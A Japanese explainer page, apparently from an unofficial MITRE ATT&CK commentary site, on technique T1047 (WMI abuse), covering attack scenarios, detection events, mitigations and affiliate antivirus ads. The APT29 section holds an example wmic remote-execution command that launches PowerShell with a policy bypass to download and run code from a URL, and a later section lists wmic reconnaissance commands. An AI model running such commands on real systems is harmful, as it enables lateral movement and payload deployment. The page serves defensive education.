T1047 Windows Management Instrumentationとは？MITRE ATT&CK日本語解説

※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。

Windows Management Instrumentation（WMI）はWindows環境の管理に不可欠なインフラですが、攻撃者にとっても強力な武器です。MITRE ATT&CKではT1047 Windows Management Instrumentationとして分類されており、APTグループからランサムウェアまで幅広く悪用されています。本記事では、WMIを使った攻撃手法、実際の攻撃事例、検出方法と緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

ATT&CK情報

ATT&CK ID	T1047
Tactic	Execution（実行 / TA0002）
対応バージョン	ATT&CK v16
対応プラットフォーム	Windows

概要

T1047はExecution（実行 / TA0002）タクティクスに属するテクニックです。WMI（Windows Management Instrumentation）はWindowsに標準搭載された管理基盤で、システム情報の収集、プロセス管理、リモートでのコマンド実行、イベント監視などの機能を提供します。

攻撃者はWMIを使って、ローカルおよびリモートでのコマンド実行、システム情報の偵察、永続化メカニズムの設置（WMIイベントサブスクリプション）、横展開（Lateral Movement）を行います。WMIはOS標準機能であり、正規の管理操作と攻撃を区別しにくいため、Living-off-the-Land手法の代表格です。

WMIへのアクセスは主に3つの方法で行われます：wmic.exeコマンドラインツール（非推奨だがまだ利用可能）、PowerShellのGet-WmiObject/Get-CimInstanceコマンドレット、そしてWMIのCOMインターフェースを直接利用するスクリプトです。

攻撃シナリオ例

APT29（Cozy Bear）— WMIによるリモートコマンド実行

APT29は、初期侵入後の横展開フェーズでWMIを積極的に活用します。窃取した管理者資格情報を使い、WMIのリモート実行機能で他のマシンにペイロードを展開します：

:: WMICによるリモートプロセス実行の例（検知テスト用）
wmic /node:"192.168.1.100" /user:"DOMAIN\admin" /password:"..." process call create "cmd.exe /c powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://...')"

この手法はRDP（リモートデスクトップ）と異なりGUIの操作痕跡を残さないため、フォレンジック調査で発見されにくい特徴があります。

WMIイベントサブスクリプションによる永続化

WMIイベントサブスクリプションは、特定のイベント（ユーザーログオン、特定時刻の到来など）をトリガーにしてコードを自動実行する仕組みです。攻撃者はこれを永続化メカニズムとして利用します：

• EventFilter: トリガー条件を定義（例: ユーザーがログオンした時）
• EventConsumer: 実行するアクション（例: PowerShellスクリプトを実行）
• FilterToConsumerBinding: トリガーとアクションを紐付け

この永続化手法はレジストリやスタートアップフォルダに痕跡を残さないため、従来の自動起動チェックでは発見が困難です。

ランサムウェアグループ — WMIによる大量展開

Ryuk、Contiなどのランサムウェアグループは、ドメイン管理者権限を取得した後、WMIを使ってネットワーク内の全マシンにランサムウェアを一斉展開します。wmic /node:@targets.txt process call createのようなコマンドで数百台のマシンに同時にペイロードを実行させ、被害を最大化します。

WMIによるシステム偵察

攻撃者は侵入後の情報収集にもWMIを多用します：

:: WMIによる偵察コマンドの例
wmic os get caption,version,osarchitecture    &:: OS情報
wmic process list brief                       &:: 実行中プロセス一覧
wmic service list brief                       &:: サービス一覧
wmic useraccount list brief                   &:: ユーザーアカウント一覧
wmic qfe list                                 &:: インストール済みパッチ一覧
wmic product get name,version                 &:: インストール済みソフトウェア

検出方法

プロセス監視

• wmic.exeの実行監視（Sysmon Event ID 1）: 特に/node:パラメータ（リモート実行）やprocess call create（プロセス生成）を含む実行を検出
• WmiPrvSE.exeの子プロセス: WMIプロバイダーホストプロセス（WmiPrvSE.exe）からcmd.exe/powershell.exeが起動された場合はリモートWMI実行の指標
• scrcons.exeの実行: WMIイベントサブスクリプションのスクリプトコンシューマーが実行された場合、永続化の可能性

Windowsイベントログ

• Microsoft-Windows-WMI-Activity/Operational（Event ID 5857〜5861）: WMIプロバイダーのロード、一時的/永続的イベントサブスクリプションの登録を記録
• Sysmon Event ID 19/20/21: WMIイベントフィルタ/コンシューマー/バインディングの作成を検出（永続化メカニズムの設置を検出）
• Sysmon Event ID 1: wmic.exeの起動とコマンドライン引数を記録
• Security Event ID 4648: 明示的な資格情報を使用したリモートWMI接続を検出

ネットワーク監視

• DCOM/RPC通信: TCP 135（RPC Endpoint Mapper）とランダム高ポートを使用するDCOM通信を監視
• WinRM通信: TCP 5985/5986（HTTP/HTTPS）でのCIM/WMI通信を監視

緩和策（Mitigations）

ID	緩和策名	概要
M1026	Privileged Account Management	WMIのリモート実行を管理者アカウントに限定し、特権アカウントの管理を厳格化
M1040	Behavior Prevention on Endpoint	EDRでWmiPrvSE.exeからの不審な子プロセス起動をブロック
M1038	Execution Prevention	AppLocker/WDACでwmic.exeの使用を制限
M1018	User Account Management	リモートWMIへのアクセス権を必要最小限のユーザーに制限

実務での推奨対策

• wmic.exeの使用制限: Microsoftはwmic.exeを非推奨としている。AppLocker/WDACでwmic.exeの実行をブロックし、必要な場合はPowerShellのGet-CimInstanceに移行
• WMI名前空間のACL設定: wmimgmt.mscでWMI名前空間のアクセス権を確認し、リモートアクセスを許可するアカウントを最小限に制限
• Sysmon導入・設定: Event ID 19/20/21でWMIイベントサブスクリプションの作成を監視し、永続化の試みを検出
• Windows Firewallの設定: 不要なリモートWMI（DCOM/RPC）通信をファイアウォールでブロック
• WMIイベントサブスクリプションの定期監査: Get-WmiObject -Namespace root\subscription -Class __EventFilterで不審なイベントフィルタを定期的にチェック

関連するテクニック

• T1059 Command and Scripting Interpreter: WMI経由で実行されるスクリプト（PowerShell、cmd.exe等）
• T1546.003 WMI Event Subscription: WMIイベントサブスクリプションによる永続化（Persistence）
• T1204 User Execution: ユーザー操作を起点としてWMI経由のスクリプト実行に連鎖するパターン

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
攻撃者がWMIを使用する場合、振る舞い検知機能を持つエンドポイント保護が有効な緩和策となります。

• ESET（イーセット） ※PR — 軽量・企業向け実績あり
• ウイルスバスター ※PR — 日本語サポート充実・国産
• Norton（ノートン） ※PR — 世界最大手・VPN機能付き

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

• T1047 WMIは、Windows標準の管理基盤を悪用するLiving-off-the-Land手法であり、攻撃チェーンの複数段階で使用される
• リモートコマンド実行、WMIイベントサブスクリプションによる永続化、ランサムウェアの大量展開が主な悪用パターン
• Sysmon Event ID 19/20/21によるWMIサブスクリプション監視、WmiPrvSE.exeの子プロセス監視が検出の鍵
• wmic.exeの使用制限、WMI名前空間ACLの厳格化、リモートDCOM通信の制限が有効な緩和策

参考文献

• MITRE ATT&CK — T1047 Windows Management Instrumentation
• IPA（情報処理推進機構）セキュリティセンター
• MITRE ATT&CK公式サイト

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（https://attack.mitre.org/）をご参照ください。